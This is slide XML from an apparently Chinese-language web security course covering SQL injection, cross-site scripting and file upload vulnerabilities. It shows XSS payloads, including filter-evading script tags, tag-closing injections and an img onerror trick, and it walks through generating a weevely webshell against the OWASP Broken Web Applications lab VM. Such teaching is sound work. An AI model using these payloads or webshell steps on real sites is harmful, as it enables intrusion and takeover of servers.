              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>服务器接收到这个请求，将构建并执行一条</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>查询：</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latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>select * from user where username = 'bob' and password = 'abc123'</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Menlo" panose="020B0609030804020204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="154273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441852"/>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输入</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>scrscriptipt</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>&gt;alert("</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>xss</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>");&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0" err="1">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>scrscriptipt</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3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE1CA513-4CB1-CCD1-ACEA-11BAA3AB0ABD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2831932" y="2523848"/>
            <a:ext cx="6528135" cy="2489328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="矩形 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2034EE76-E944-B72A-68BF-11AC1702DC17}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5303912" y="4560600"/>
            <a:ext cx="2448272" cy="432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08478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390433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右键查看源码：</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没能弹出对话框的原因是</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script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标签没能</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>跳出</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>input</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>标签</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8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{72EC131B-4442-C7BF-9B2F-ED3FD1B9CE49}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="839416" y="2204864"/>
            <a:ext cx="10555520" cy="2875590"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="矩形 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5E40C4B-5644-BDAB-8B20-212522EA4341}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2279576" y="4309786"/>
            <a:ext cx="5832648"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2433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1211294"/>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这个时候的思路就是想办法将前面的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&lt;input&gt;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标签闭合，于是构造如下脚本：</a:t>
            </a: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/&gt;&lt;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scrscriptipt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&gt;alert('XSS')&lt;/</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scscriptript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t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:endPar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XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>攻击实验</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4204DD8-3967-C913-F220-A7C6F8814665}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3068508" y="2780928"/>
            <a:ext cx="5918504" cy="2209914"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3968757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跨站脚本攻击</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43184" y="1684520"/>
            <a:ext cx="10369152"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另外一种使用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img</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标签的脚本构造方法：</a:t>
            </a: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img</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src</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=ops! </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onerror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="alert('XSS')"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t>
            </a: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&lt;</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img</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&gt;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标签是用来定义</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HTML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中的图像，</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src</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一般是图像的来源。而</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onerror</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事件会在文档或图像加载过程中发生错误时被触发。所以上面这个攻击脚本的逻辑是，当</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img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加载一个错误的图像来源</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ops!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时，会触发</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en"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onerror</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事件，从而执行</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alert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函数。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="文本框 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7EA0BF56-26A8-FA7B-D7E9-B4ED4310D0CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="851988" y="1138449"/>
            <a:ext cx="798031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扩展思考：跨站脚本攻击必须是</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>javascript</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>脚本吗？</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="图片 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3D24F12C-8D92-16A2-7293-389F80387841}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2639616" y="3869390"/>
            <a:ext cx="6438900" cy="2235200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1217740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03</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="6000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>  文件上传漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1893399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文件上传漏洞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文件上传</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07700"/>
            <a:ext cx="4824536" cy="3904339"/>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不少系统管理员都有过系统被上传后门，木马或者网页被人篡改的经历，这类攻击相当一部分是通过文件上传进行的。</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文件上传本身是一个正常的业务需求，但如果没有对用户上传的文件进行恰当的检测，导致攻击者能够上传一个恶意的脚本文件，并通过这个文件获取在服务器上执行系统命令的能力，就变成了一个安全漏洞。</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文件上传漏洞</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25578"/>
            <a:ext cx="4824536" cy="1980735"/>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文件上传漏洞本身就是一种危害巨大的漏洞，</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更是将这种漏洞的利用扩大危害。大多数的文件上传漏洞被利用后攻击者都会留下</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以方便后续进入系统。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1258304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文件上传漏洞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48820"/>
            <a:ext cx="1566519"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WebShell</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07700"/>
            <a:ext cx="4824536" cy="4289059"/>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就是以</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JSP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或者</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CGI</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等网页文件形式存在的一种命令执行环境，也可以将其称为一种网页后门。</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攻击者在入侵网站后，通常会将这些</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ASP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或</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后门文件与网站服务器</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目录下正常的网页文件混在一起，然后使用浏览器访问这些后门，得到一个命令执行环境，以达到控制网站服务器的目的（可以上传，下载或者修改文件，操作数据库，执行任意命令等）。</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20"/>
            <a:ext cx="1566519"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WebShell</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25578"/>
            <a:ext cx="4824536" cy="3134897"/>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后门隐蔽性高，可以轻松穿越防火墙，访问</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时不会留下系统日志，只会在网站的</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日志中留下一些数据提交记录，没有经验的管理员不容易发现入侵痕迹。攻击者可以将</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隐藏在正常文件中并修改文件时间戳增强隐蔽性，也可以采用一些函数对</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进行编码或者拼接以规避检测。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3696355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2A06E5D-6112-64CD-E54C-E4C78F51BF94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="1772816"/>
            <a:ext cx="10369153" cy="4457391"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>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0C5CDA7-C736-8EC9-CC66-D0A7F534E654}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="983432" y="5275204"/>
            <a:ext cx="936104"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1033436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第一步：在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>OWASP Broken Web Applications VM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>中选择文件上传漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1976114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1033436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第一步：在</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en" altLang="zh-CN" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>OWASP Broken Web Applications VM</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>中选择文件上传漏洞</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="图片 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8CA732BC-B8BB-CB0D-145E-ABE56757D5D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="911423" y="1706792"/>
            <a:ext cx="10369153" cy="4514485"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="矩形 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73D49CC8-952A-3A37-E763-B2874878061B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3647728" y="2636912"/>
            <a:ext cx="2160240" cy="8363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1039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637668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第二步：用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>weevely</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>生成一句话木马</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en-US" altLang="zh-CN" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0048AA"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shell.php</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54EF21C-F93C-8EE3-030E-33C78E2C4F94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="911424" y="1706792"/>
            <a:ext cx="10369152" cy="1099468"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pP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是一款用</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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P</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1"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ython</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编写的</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en"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W</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ebShell</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工具，能生成</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en"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W</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ebShell</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和连接</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="en"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W</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ebShell</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可以用以下命令安装</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sudo</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 apt install </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endPar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33C5CE89-A1B8-713A-62F1-2226D4B1171C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="935427" y="2925167"/>
            <a:ext cx="10321145" cy="2880320"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135281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SQL</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="1" lang="zh-CN" altLang="en-US" sz="3200" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>注入漏洞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839416" y="1118601"/>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客户端</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="文本框 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{834F9780-0674-44A0-FF7F-C80FD400A950}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="788302" y="1646353"/>
            <a:ext cx="5104570" cy="3176960"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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&lt;form</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action</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"login.php"</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method</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"GET"</a:t>
            </a:r>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"text"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name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"user"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a: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"text"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name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"passwd"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>/&gt;       </a:t>
            </a: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    &lt;input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type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"submit"</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FF0000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>value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FF"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>"submit"</a:t>
            </a:r>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solidFill>
                  <a:srgbClr val="800000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>&lt;/form&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>当用户通过浏览器向表单提交了用户名</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" altLang="zh-CN" dirty="0">
                <a:latin typeface="Microsoft YaHei" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
